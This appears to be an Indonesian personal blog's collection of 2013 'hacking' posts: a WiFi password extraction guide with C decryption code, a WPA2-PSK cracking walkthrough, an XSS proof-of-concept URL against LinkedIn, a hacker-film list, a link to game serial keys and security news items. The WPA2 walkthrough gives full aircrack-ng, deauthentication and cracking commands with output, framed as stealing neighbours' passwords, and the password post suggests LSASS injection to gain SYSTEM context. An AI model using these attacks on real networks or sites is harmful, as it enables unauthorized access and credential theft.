pub-7594223835742334 Sebuah blog diwaktu luang: hacking
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Wednesday, July 24, 2013

Cara Mengekspos Sandi Rahasia WiFi

http://diaz-zahran-asyari.blogspot.com/
Pada Kesempatan kali ini saya akan membuat posting tentang Cara Mengekspos Sandi Rahasia WiFi. Ini adalah Cara Mengekspos Sandi Rahasia WiFi saya, saya sudah mencobanya dan sudah saya berxperimen di laptop saya, dan alhasil berhasil. postingan ini berdasarkan referensi securityxploded, karena ini bulan puasa saya akan berniat membagikan cara ini untuk pembaca dan pengunjung sekalian, karena bila bukan saya yang berbagi siapa lagi?. Langsung saja ini Cara Mengekspos Sandi Rahasia WiFi


Sebelumnya...
Postingan penelitian ini melempar cahaya pada sandi penyimpanan internal dan mekanisme enkripsi yang digunakan untuk menyimpan password akun WiFi. Ini menjelaskan di mana password WiFi disimpan pada platform yang berbeda dan bagaimana untuk mendekripsi mereka menggunakan sampel kode praktis.

Perhatikan karena, berhubungan dengan pengaturan WiFi hanya disimpan oleh built-in Windows Wireless Configuration manager. dan Juga hanya mencakup Vista dan sistem operasi yang lebih tinggi, meskipun mungkin menyentuh beberapa aspek di Windows XP.

Konfigurasi WiFi
Semua sistem Windows telah built-in 'Wireless Configuration manager' yang membantu dalam mengelola koneksi nirkabel Anda.

Nah dan Berikut ini adalah langkah-langkah sederhana yang terlibat dalam mengkonfigurasi pengaturan WiFi :

1. Dari Control Panel, klik 'Network & Internet'
2. Selanjutnya klik pada 'Network & Sharing Center'. Anda akan melihat semua koneksi jaringan Anda
3. Sekarang dari klik panel kiri pada 'Manage Wireless Networks'
4. Ini akan menluncurkan layar 'Wireless configuration' menampilkan semua koneksi WiFi Anda dikonfigurasi
5. Anda dapat mengklik 'ADD' dan kemudian klik 'Manually Create Network Profile' untuk membuat sambungan WiFi baru.
Berikut adalah screenshot yang menunjukkan dialog 'Add Wireless Network'

http://diaz-zahran-asyari.blogspot.com/
Klik Gambar Untuk Memperbesar
Lokasi Sandi WiFi
Sebelum kita melanjutkan, kita perlu tahu di mana pengaturan nirkabel disimpan pada sistem. Tergantung pada platform windowsnya karena berbeda-beda, 'Wireless Configuration Manager' menggunakan teknik yang berbeda dan lokasi penyimpanan yang berbeda untuk menyimpan pengaturan ini nirkabel.


Untuk Windows XP/2003Pada XP, semua pengaturan Wireless disimpan dalam Registry di lokasi berikut,.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
Di sini, setiap perangkat / antarmuka nirkabel diwakili oleh GUID unik {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} dan semua pengaturan untuk perangkat ini disimpan di bawah GUID ini. dan dalam nilai 'ActiveSettings'. Isi sebenarnya dienkripsi menggunakan fungsi 'Windows Kriptografi'.

Untuk Vista, Windows 7 & Windows 8Seterusnya untuk Vista, 'Wireless Configuration Manager' tidak lagi menggunakan registry. Sebaliknya semua parameter nirkabel termasuk SSID, metode otentikasi & Password terenkripsi ini disimpan di file berikut ini,
C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml
Di sini, setiap perangkat nirkabel diwakili oleh antarmuka GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} dan semua pengaturan nirkabel untuk perangkat ini disimpan dalam file XML dengan nama acak GUID.
Mekanisme Penyimpanan WiFi
Semua informasi yang dibahas hanya sebagainya, maka hanya akan berlaku untuk Vista dan hanya sistem operasi yang lebih tinggi.

Seperti kita sudah tahu, setiap pengaturan nirkabel disimpan dalam file XML. Berikut adalah isi sebenarnya dari satu file tersebut,


<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>SecurityXploded</name><SSIDConfig><SSID><hex>536563757269747958706C6F646564</hex><name>SecurityXploded</name></SSID><nonBroadcast>false</nonBroadcast></SSIDConfig><connectionType>ESS</connectionType><connectionMode>auto</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPAPSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>true</protected><keyMaterial>01000000D08C9DDF0115D1118C7A00C0***TRUNCATED***DA88A2</keyMaterial></sharedKey></security></MSM></WLANProfile>

Setiap profil Wireless terutama menyimpan informasi tentang nama WiFi, pengaturan keamanan seperti otentikasi, enkripsi dan password terenkripsi.
Dalam contoh di atas, WiFi Nama jaringan alias SSID adalah 'SecurityXploded' yang disimpan dalam format baik ASCII dan HEX. Selanjutnya hal penting adalah otentikasi & enkripsi yang disimpan dalam <authEncryption> simpul. Konfigurasi ini nirkabel menggunakan WPA (WPAPSK) untuk otentikasi dan AES untuk enkripsi.


Sekarang datang hal yang paling menarik, 'WiFi Password' yang disimpan di bawah di bawah simpul <sharedKey>. Lapangan Disini <protected> menunjukkan jika password dienkripsi atau disimpan dalam bentuk teks. Jika bidang <protected> benar bahwa sarana password terenkripsi dan sama dapat ditemukan di simpul <keyMaterial> seperti dalam contoh di atas.

WiFi Sandi Enkripsi & Dekripsi
Jika Anda salah satu dari kita yang hidup di dunia Crypto maka tidak mengambil banyak waktu untuk memecahkan metode enkripsi yang digunakan di sini.

Lebih jelas menggunakan fungsi 'Windows Kriptografi' untuk mengenkripsi & mendekripsi password WiFi. Berikut adalah tanda tangan yang pada awal password terenkripsi.

01000000D08C9DDF0115D1118C7A00C0

Untuk lebih tepat, 'Wireless Configuration Manager' menggunakan CryptProtectData untuk mengenkripsi kunci Wireless & password. Lain hal penting adalah bahwa ia tidak menggunakan salt atau magic key untuk enkripsi. Hal ini membuat dekripsi sederhana dan mudah menggunakan CryptUnprotectData seperti yang ditunjukkan pada contoh di bawah.

//// Wireless Key/Password Decryption Algorithm for Vista/Windows 7/Windows 8//void DecryptWiFiPassword(BYTE *buffer, DWORD dwSizeBuffer){ DATA_BLOB DataIn; DATA_BLOB DataOut;   DataIn.pbData = buffer; DataIn.cbData = dwSizeBuffer; if(CryptUnprotectData(&DataIn, 0, NULL, NULL,NULL,0,&DataOut)) { printf("\n Wireless Key Password : %s", (char *) DataOut.pbData);
} }

Satu menangkap di sini adalah bahwa Anda tidak bisa hanya mendekripsi password meskipun Anda administrator. Untuk berhasil mendekripsi password, Anda harus melakukan operasi dekripsi bawah konteks sistem.

Ada banyak cara untuk mengeksekusi kode di bawah SYSTEM context, salah satu cara yang populer adalah dengan menginjectkan kode melalui remote thread dalam proses sistem - file LSASS.EXE. Tapi yang satu ini lebih berisiko, karena setiap salah dalam kode dapat menurunkan seluruh sistem. Untuk Cara yang lebih aman adalah menciptakan layanan Windows sebagai Akun Sistem dan kemudian mengeksekusi kode dekripsi atas dari layanan tersebut.(securityxploded)

NOTE: Saya tidak bertanggung jawab apabila ada kesuksesan maupun kegagalan dalam melakukan Cara Mengekspos Sandi Rahasia WiFi diatas. 


Jadi Lakukan dengan resiko sendiri, Do With Own Risk.
~ Zahran Diaz ~

keywords: memamerkan, memberikan, mengetahui, mendapatkan, mencuri, memaling

Didukung oleh Google
Sekian postingan Tentang Cara Mengekspos Sandi Rahasia WiFi
Terima kasih,
Diaz

Wednesday, June 12, 2013

30 Film Yang Menggambarkan Tentang Hacker

Pada kesempatan kali ini saya akan membuat posting tentang Film yaitu 30 Film Yang Menggambarkan Tentang Hacker, setelah sebelumnya saya memposting Mengapa Blog Loadingnya Lambat dan Apa Penyebabnya?

Pasti anda sudah tahukan hacker itu apa?, bila belum tahu nih, Menurut pak wikipedia: Hacker atau Peretas adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. begitu kata pak wikipedia, bisa dipahami?...

Film yang saya posting disini tidak ada satupun yang menggambarkan sebenarnya proses hacking komputer, tetapi sebagian besar cerita film ini mengesankan dalam beberapa adegan. dan juga Sebagian besar dari film-film hacker ini baik yang lain dari kenyataan, dan menyenangkan yang melibatkan caper perampokan atau konflik virtual reality. Beberapa visual yang menakjubkan. Anda tidak akan belajar baris perintah root rahasia atau teknik sniffing paket dengan menonton film-film ini. Tetapi jika Anda ingin beberapa daftar film menghibur yang melibatkan komputer dan kejahatan disini,Kami telah merangkum 30 Daftar Film Yang Menggambarkan Tentang Hacker dan disusun dari atas kebawah, berikut ini:

30. The Matrix (1999)
Warner Bros
Ini adalah seperti petualangan terobosan dalam realitas dan eksistensialisme. Tidak, Anda tidak akan belajar bagaimana untuk masuk ke server Linux dengan menonton Trinity port-scanning dengan "nmap". Tapi film ini pasti keren, tetap.

29. The Italian Job (2003)
Paramount Pictures
Film pencurian modern selalu melibatkan semacam hacking. Ini film pencurian tertentu sangat menghibur, terutama ketika penemu sejati seharusnya "Napster" adalah hacker utama. Setidaknya 20 menit dari rekaman hacking dalam actioner ini. Pasti layak menyewa jika Anda belum melihatnya.

28. The Girl dengan Tattoo Naga (2009)
Aliansi Film
Dia seorang hacker Swedia yang jenis pada Mac dan hidup dengan Sindrom Asperger. Dia tim dengan seorang jurnalis untuk memecahkan misteri pembunuhan. Dan dia memiliki tato naga. Berdasarkan novel Stieg Larsson, film ini telah menerima pengakuan internasional, dan telah dibuat ulang dalam bahasa Inggris dengan Daniel Craig. Peringatan: film ini memang memiliki konten seksual grafis.

27. Antitrust (2001)
Gambar MGM
Film ini memiliki beberapa poin yang kuat tentang hal itu. Dua idealis komputer jagoan lulusan anak-anak dari Stanford, dan salah satu dari mereka memasuki dunia pemrograman sektor swasta. Benar saja, kedua pemrogram menemukan diri mereka di tengah-tengah skandal cybercrime. Pasti layak menyewa selama tiga dolar.

26. MI4: Ghost Protocol (2011)
© Paramount Pictures
Keempat film Mission Mustahil dengan Tom Cruise adalah kejutan nyata. Kebanyakan sekuel cenderung untuk pergi menurun dalam rasa, namun angsuran ini telah menjadi pleaser kerumunan untuk stunts indah yang live-action dan sensasi berteknologi tinggi. Dalam actioner modern, Anda akan melihat iPhone yang memecahkan kode pintu, iPads yang memata-matai penjaga keamanan, vektor intrusi nirkabel yang disampaikan oleh balon, jaringan keamanan dibajak, dan sedikit hacker menyenangkan yang melibatkan Dean Martin musik. Acara ini pasti memiliki banyak momen hacker menghibur, dan bagus 2 jam kegembiraan beroktan tinggi.

25. The Score (2001)
Paramount Pictures
Edward Norton dan Robert De Niro yang luar biasa dalam pencurian ini film. Dalam plot cerdas untuk merampok sebuah rumah adat Montreal beberapa artefak kerajaan, Norton dan De Niro harus masuk ke sistem keamanan dengan bantuan seorang hacker sosial-canggung yang tinggal di ruang bawah tanah ibunya. 10 menit dari hacking, dan 100 menit fenomenal perampokan bercerita!

24. Gamer (2009)
Gambar Lionsgate
Film ini adalah favorit kultus gamer video: itu menggambarkan masa depan dystopic mana pikiran tahanan negara adalah komputer terkait dengan konsol permainan pemain kaya. Tindakan ini brutal kekerasan, dan konsep yang di atas. Tapi komputer grafis dan efek khusus akan memuaskan para penggemar Bloodthirst tindakan. 10 menit terakhir adalah campuran menakutkan hacking dan megalomania: Michael C. Hall lipsynchs Sammy Davis Jr, sementara pikiran mengendalikan tentara zombie nya ... adegan saja bernilai harga sewa.

23. Pirates of Silicon Valley (1999)
Warner Bros
Ini adalah cerita tentang bagaimana cacat Apple dan Microsoft muncul. Sementara film ini mendapat tinjauan yang beragam, banyak orang telah berkomentar mereka menyukainya. Tiga dolar di toko video Anda, dan Anda dapat memutuskan sendiri apakah ini adalah film yang bagus.

22. Hacker (1995)
United Artists
Jangan membawa otak Anda untuk menonton ini, baik. Cerita ini lemah, dan adegan hacking tempat di dekat kenyataan. Tapi Anda harus melihat ini hanya untuk mengatakan Anda lakukan. Anda akan belajar di mana nama-nama ikon "Nol Cool" dan "Lord Nikon" berasal. Anda akan mendengar beberapa terobosan techno musik soundtrack. Ditambah: Angelina Jolie adalah alasan yang cukup bagi kebanyakan pria untuk menyewa kultus klasik ini.

21. The Conversation (1974)
Terpenting
Meskipun Anda tidak akan melihat komputer dalam film klasik ini, tema pengawasan dan pelanggaran privasi orang begitu ahlinya dieksplorasi di sini.

** Terkait Film: The Conversation itu kembali dibayangkan sebagai Musuh Will Smith Negara pada tahun 2001. 2001 pengobatan cerita itu dirancang sebagai sebuah thriller techno modern, dan memiliki beberapa efek khusus yang luar biasa dan urutan pengawasan satelit. Memiliki Hackman Gene bintang dengan Will Smith membuatnya layak harga sewa DVD.

20. Takedown (2000)
Dimension Films
Juga dikenal sebagai 'Melacak', ini adalah kisah sensasional dari phreaker ponsel terkenal, Kevin Mitnick. Ini adalah jelas sebuah film kelas B, bahkan film C-kelas di benak banyak orang. Tapi film ini cacat juga kultus klasik antara hacker.

19. Ketigabelas Floor (1999)
Columbia Pictures
Sebuah versi yang sangat ekstrim "The Sims", film ini adalah tentang ilmuwan yang menciptakan dunia maya dimana para peserta menghubungkan dan mengambil alih hidup karakter komputer. Karakter tidak menyadari keberadaan wayang mereka, tapi kemudian pembunuhan kehidupan nyata getar dasar permainan.

18. Tron: Legacy (2010)
Walt Disney Pictures
Kebanyakan film hacker sekitar perampokan atau sekitar virtual reality. Dalam kasus yang terakhir ini, Disney mengunjungi kembali dunia ikonik "Grid", di mana program komputer telah menjadi humanoids hidup dalam masyarakat gladiator-jenis. Sementara elemen hacker yang sebenarnya sangat minim, ini sekuel kultus-klasik adalah film seni megah visual dengan skor suara atmosfer. Tron: Legacy sangat dianjurkan untuk setiap penggemar asli Tron, dan bagi siapa pun yang mencintai efek CG yang baik.

17. FoolProof (2003)
Aliansi Atlantis
Film Kanada-anggaran yang lebih rendah tentang perampok bank hobi, ini adalah kejutan yang menyenangkan untuk banyak pemirsa. Ryan Reynolds dan teman-temannya "hampir" merampok bank untuk bersenang-senang, tetapi diperas dalam melakukan pencurian untuk nyata. Ini adalah sewa tindakan yang baik.

16. Revolution OS (2001)
Wonderview Productions
Film dokumenter ini menceritakan tentang sistem operasi Linux, dan bagaimana meneruskan filosofi "open source" dan properti intelektual gratis. Bukan sebuah film laga, tapi pasti menarik bagi orang-orang yang ingin mempelajari lebih lanjut tentang mengapa budaya komputer cara itu. Jika Anda dapat menemukan salinan ini, pasti menyewa itu.

15. eXistenZ (1999)
Aliansi Atlantis
Sebuah film David Cronenberg, ini adalah entri creepiest dalam daftar. Seorang desainer game membuat permainan realitas buatan yang dihubungkan langsung ke pikiran orang. Garis antara realitas dan permainan kemudian mengaburkan dengan cara kekerasan dan mengerikan. Ini adalah sangat banyak film seni yang kuat, dan tidak untuk semua orang. Memiliki film Disney siap untuk menonton sebagai pengejar setelah pertunjukan ini. Tepat begitu: kami pilihan nomor 1 di bawah ini adalah film Disney ...

14. Swordfish (2001)
Warner Bros
Kekerasan over-the-top, situasi tidak masuk akal, wanita seksi, dan luar biasa efek khusus membuat ini sewa popcorn besar. Tidak, tidak membawa otak Anda untuk menonton ini, tapi jika Anda suka techno-thriller, pasti menyewa ini. John Travolta adalah penjahat berlendir, Hugh Jackman adalah hacker pahlawan studly, dan Halle Berry adalah gadis misterius.

13. Virtuosity (1995)
Paramount Pictures
Keahlian adalah konsep menarik film: yang sintesis dari kecerdasan buatan didasarkan pada pikiran pembunuh berantai. Sayangnya, program ini berhasil membebaskan diri dan menganggap bentuk fisik. Ini adalah premis fantastis, ya, tapi fans tindakan mungkin benar-benar menikmati menonton Denzel Washington memburu Russel Crowe.

12. Core (2003)
Paramount Pictures
Film bencana tidak untuk semua orang, tapi ini B-film adalah mengherankan menghibur. Ada beberapa adegan dramatis dicatat dan tema menarik pengorbanan diri dan persahabatan. Segmen "hack-dunia" hanya sekitar 10 menit dari seluruh film, tetapi mereka segmen komedi, dan harus membuat pecinta geek-senyum.

11. The Lawnmower Man (1992)
Columbia TriStar
Citra komputer dan teknologi hacker berlimpah di seluruh film ini aneh. Tidak ada koneksi ke cerita Stephen King, ini B-film adalah sebuah eksplorasi masa depan yang hipotetis di mana para ilmuwan dapat memanipulasi otak manusia dengan mesin dan obat-obatan. Seperti cerita serupa, percobaan istirahat bebas, dan memutuskan untuk membalas dendam pada peneliti. Sementara kualitas produksi film dan akting dilupakan, konsep dan tema di sini adalah aneh menghantui.

10. Jurassic Park (1993)
Universal Pictures
Ini adalah sebuah film yang menghibur! Bahkan bertahun-tahun kemudian, reptil dapat membuat orang melompat keluar dari kursi mereka. Dan Wayne Ksatria menggambarkan hacker menjijikkan yang mencuri rahasia DNA dari proyek Jurassic ... dan dibayar untuk penipuannya dalam darah. Pasti menyewa film ini selama 5 menit adegan hacker, dan 110 menit laga-petualangan yang menyenangkan!

9. Diclosure (1994)
Warner Bros
Pengungkapan adalah film yang sangat baik, baik bagi hacker komputer dan untuk getaran spionase korporasi. Seorang ilmuwan komputer brilian akan melewati untuk promosi, yang pergi ke cinta bunga dari masa lalunya. Michael Douglas dan Demi Moore yang indah sebagai plot twisted penipuan dan pengkhianatan terus penonton terpaku selama 90 menit.

8. One Point O (2004)
Gambar Armada
Juga dikenal sebagai 'Paranoia: 1.0', film ini mengharuskan Anda untuk membawa otak Anda. One Point O adalah film seni yang megah, dan sangat berbeda dari film-film Hollywood. Programmer komputer muda terisolasi menerima paket misterius, yang membawanya ke dunia yang aneh dari konspirasi perusahaan, pengendalian pikiran, dan kehidupan aneh tetangganya. Bukan untuk pemirsa sabar, film ini lambat, menghantui, visual memukau, dan sangat meditatif ... setiap adegan dipentaskan memiliki rasa tersendiri. Banyak pemirsa sarankan menonton film ini dua kali untuk menangkap semua rincian pintar. Jika Anda berada dalam suasana hati yang langka untuk sesuatu pemikiran dan disengaja, maka pasti menyewa One Point O.

7. Deja Vu (2006)
Touchstone Pictures
Meskipun tidak persis film 'hacking', Deja Vu melibatkan campur tangan komputer yang canggih dalam perjalanan waktu. Tim Val Kilmer tentang FBI komputer Geeks menambah kepercayaan teknis untuk cerita ini fantastis, plot terorisme mengerikan, dan Denzel Washington selalu menarik untuk menonton saat ia bergegas untuk menyelamatkan para korban ledakan dan gadis-gadis cantik.

6. Untraceable (2008)
Sony Pictures
Untraceable adalah sebuah thriller kelas B menegangkan. Agen FBI Marsh perlu menghentikan pembunuh berantai dari menyembelih korban lagi, aksi-aksi brutal yang ia siaran live di Internet. Diperingatkan: kekerasan grafis. Anda akan ingin menonton film Disney bahagia setelah mengganggu thriller kucing dan tikus.

5. GoldenEye (1995)
Gambar MGM
Pierce Brosnan 007 entri di sini berkisar menghentikan 'Goldeneye' program hacker dan satelit weaponized. Lengkap dengan ilmuwan komputer perempuan yang indah dan adegan aksi yang mahal, 007 mengambil ancaman digital menggunakan pistol Walther dan gaya licin.

4. Die Hard 4: Live Free atau Die Hard (2007)
20th Century Fox
Serahkan saja Bruce Willis untuk menyelamatkan dunia dari uber hacker. Macintosh iklan kepribadian, Justin Long, memainkan programmer enggan terjebak dalam skema terorisme digital. Seperti Swordfish, film ini memiliki kekerasan over-the-top dan urutan tindakan keterlaluan, tetapi jika Anda menyukai Hard seri Die, pasti melihat ini.

3. Sneakers (1992)
Universal Pictures
Sementara tanggal, film ini merupakan terobosan pada saat itu, dan masih menarik untuk hari ini. Cerita ini berkisah tentang dua teman kuliah yang mengambil jalan yang berbeda dalam hidup. Seseorang menjadi seorang hacker etis, dan yang lainnya ... baik, dia tidak begitu mulia. Beberapa tikungan plot besar dan adegan komik membuat ini cara yang baik untuk menghabiskan hari Sabtu sore di rumah.

2. Wargames (1983)
Gambar MGM
Ya, film ini sangat tua, tetapi masih sebuah film penting dalam pikiran banyak pemirsa '. Seorang pemuda menemukan pintu belakang ke dalam komputer militer yang dihubungkan ke jaringan pertahanan nuklir Amerika Serikat. Sebuah plot masuk akal, tapi komentar menarik tentang perang nuklir dan kehancuran umat manusia. Anda harus melihat film ini hanya untuk mengatakan Anda telah melihatnya.

1. Tron (1982)
Gambar Disney
Film Klasik! Seorang hacker diangkut ke alam semesta digital "Grid", dan harus bertahan hidup memerangi sebagai cyber gladiator untuk menghentikan villanous Master Control. Imajinasi di balik film ini dibuat riak besar di dunia fiksi ilmiah, dan hari ini, Tron adalah kultus klasik bahwa setiap pengguna komputer harus melihat setidaknya sekali.
[Source: netforbeginners.about.com]

Semoga Postingan Tentang Daftar 30 Film Yang Menggambarkan Tentang Hacker diatas menjadi motivasi anda dalam hobi hacker atau it anda, dan bermanfaat.
Terima kasih
Diaz,

Tuesday, June 4, 2013

LinkedIn Dengan Otentikasi Dua Faktor Dan Cross Site Scripting Flaw

LinkedIn dengan otentikasi dua faktor dan Cross Site Scripting Flaw, Dua Faktor Otentikasi menjadi standar dalam ruang keamanan perusahaan dalam upaya untuk dual mengamankan pengguna akhir terhadap serangan berbahaya.

Setelah Dropbox, Google dan hampir semua orang, LinkedIn menambahkan otentikasi dua faktor untuk proses login hari ini.

LinkedIn akan memberikan kode sementara untuk otentikasi dua faktor melalui pesan SMS. Langkah ekstra ini dirancang untuk mengurangi kemungkinan hacker komputer membobol account pengguna.

Untuk mengaktifkan verifikasi dua langkah di LinkedIn, tekan ikon di sudut kanan atas situs, klik pada "Privacy & Settings," dan kemudian pada "Mengelola pengaturan keamanan" di bagian bawah.

Situs ini telah memberikan instruksi kepada para pengguna 225 juta tentang cara mengaktifkan layanan opsional.



Di sisi lain, hari ini @ The_Pr0ph3t, Hacker whitehat dari Spanyol melaporkan Cross Site Scripting Kerentanan dalam situs LinkedIn Developer (developer.linkedin.com).
Cacat masih ada di website pada saat menulis, dan hacker juga melaporkan cacat kepada tim pengembang LinkedIn untuk patch.

Bukti Konsep:
http://developer.linkedin.com/search/node/%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E

(thehackernews.com)

Sekian Postingan Tentang LinkedIn dengan otentikasi dua faktor dan Cross Site Scripting Flaw
Terima kasih,
Diaz

Tuesday, May 28, 2013

Serial Number Arcade Town

Serial Number Arcade Town adalah serial key atau kunci untuk membuka lisensi game dari arcade town.
Berikut ini Serial Number Arcade Town
http://diaz-zahran-asyari.blogspot.com/2011/09/daftar-game-arcade-town-serial-number.html
Ini hanya postingan perantara untuk ke halaman daftar game arcade town.
Sekian.
Terima kasih
Diaz 

Friday, April 12, 2013

Hacker Mungkin tidak bisa membajak sebuah pesawat dengan Software


Hackers Probably Can%27t Hijack an Airplane with Software
Jadi, mengapa Hugo Teso, hacker Jerman tersebut, memberitahu semua orang di konferensi serta wartawan yang tak terhitung jumlahnya yang pernah terkunci pada cerita bahwa ia bisa mengambil alih software? Nah, Teso mengatakan dia berhasil mengambil alih kontrol pesawat dalam simulator penerbangan melalui komputer desktop di rumah. Berharap untuk mengungkapkan beberapa kelemahan keamanan dalam sistem manajemen penerbangan pesawat '(FMS), Teso membeli beberapa hardware FMS di eBay serta beberapa software FMS itu, menurut Forbes "diiklankan sebagai mengandung beberapa atau semua kode yang sama seperti sistem dalam pesawat nyata "dan memberikannya pergi.
Dan dia melakukannya! Teso mengatakan bahwa teknik-nya akan mengirim sinyal radio untuk pesawat dan membajak kontrol nya. "Anda dapat menggunakan sistem ini untuk memodifikasi sekitar segala sesuatu yang berhubungan dengan navigasi pesawat," kata Teso Forbes. "Itu termasuk banyak hal-hal buruk."

Untuk rekap bahwa urutan peristiwa: Hacker membeli peralatan dari eBay, beban hingga perangkat lunak yang mungkin berisi "beberapa atau semua kode yang sama" yang ada di jet komersial dan dalam simulator penerbangan membajak pesawat. Kalau dipikir-pikir, itu tidak terdengar sedikit jangkauan-y bukan? Seluruh hal tampaknya bahkan kurang dipercaya jika Anda memeriksa slide yang ia gunakan selama presentasi, lengkap dengan gambar dari The Matrix dan kartun Manga Jepang. Salah satu alasan mengapa cerita merasa seperti itu bisa menjadi layak adalah fakta bahwa telah ada peringatan dari semua sisi industri keamanan dunia maya tentang kerentanan dalam perangkat lunak kontrol lalu lintas udara. Ini telah terjadi selama bertahun-tahun, dan FAA telah benar-benar mengakui risiko di ajang itu.

Kami tidak mencoba untuk mengatakan bahwa Teso yang membuat semua ini. Tapi hacking ke flight simulator komputer desktop Anda adalah sesuatu yang anak-anak sekolah menengah dilakukan di kelas teknologi. Ini bukan alasan untuk menyerang ketakutan ke dalam hati jutaan. Tapi hei, setidaknya Teso tampaknya berniat baik. Anda tentu tidak bisa mengatakan bahwa tentang semua hacker-jenis hari ini.(thehackernews.com)

Friday, March 22, 2013

Mac OS X adware Trojan menyebar melalui plugin browser

Diaz Zahran Asyari
Perusahaan Antivirus Rusia melaporkan Web Dokter yang baru Mac OS X Trojan adware menyebarkan dirinya melalui halaman trailer film dibuat yang meminta pengguna untuk menginstal plugin browser. Pada dasarnya, adware adalah setiap paket perangkat lunak yang secara otomatis membuat iklan untuk menghasilkan pendapatan bagi penulisnya.

Dijuluki sebagai, 'Trojan.Yontoo.1' Penyerang telah menyediakan sejumlah cara alternatif untuk menebar ancaman. Trojan juga dapat didownload sebagai media player, kualitas video peningkatan program atau download accelerator.
Ketika korban mengunjungi situs, dialog hanya meniru piring tradisional dan dirancang khusus oleh hacker untuk memasukkan korban potensial dari menyesatkan. Setelah menekan «Instal plug-in» Korban diarahkan ke situs untuk men-download malware.
Ketika diluncurkan, Trojan.Yontoo.1 menampilkan jendela dialog yang meminta pengguna jika mereka ingin menginstal Tabung Twit Gratis. setelah pengguna menekan 'Lanjutkan', bukan program yang dijanjikan, download Trojan.
 
Yontoo5
Sementara pengguna surfs web, plugin mengirimkan informasi tentang halaman dimuat ke remote server. Sebagai imbalannya, ia mendapat file yang memungkinkan Trojan untuk menanamkan pihak ketiga kode ke halaman yang dikunjungi oleh pengguna. Ini adalah bagaimana sebuah halaman apple.com ditampilkan pada mesin yang terinfeksi.

Saturday, December 29, 2012

Wireless Hacking Password WPA2-PSK


Logo Wifi

Bila anda tinggal di kota pasti banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Kesal bila sedang mau menggunakan wifi tetapi di password. Nah berikut ini adalah cara untuk melakukan Wireless Hacking Password WPA2 / PSK yang di password.

Mengapa saya membuat postingan ini? karena saya mendapat kiriman pesan dari FANS :

Bahan-bahan yang diperlukan adalah:
1. Anda harus BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda.
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Download BackTrack 5
Download Wordlist John The Ripper Disini:
Download Wordlist
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install terlebih dahulu.
Wireless Hacking Using BackTrack 5
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@zahrandiaz:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)

2. Ternyata ada yang terlihat, yuk mari kita jadikan target, wireless tersebut:

root@zahrandiaz:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Sip, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@zahrandiaz:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Kita harus sabar ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@zahrandiaz:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@zahrandiaz:~#


5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@zahrandiaz:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
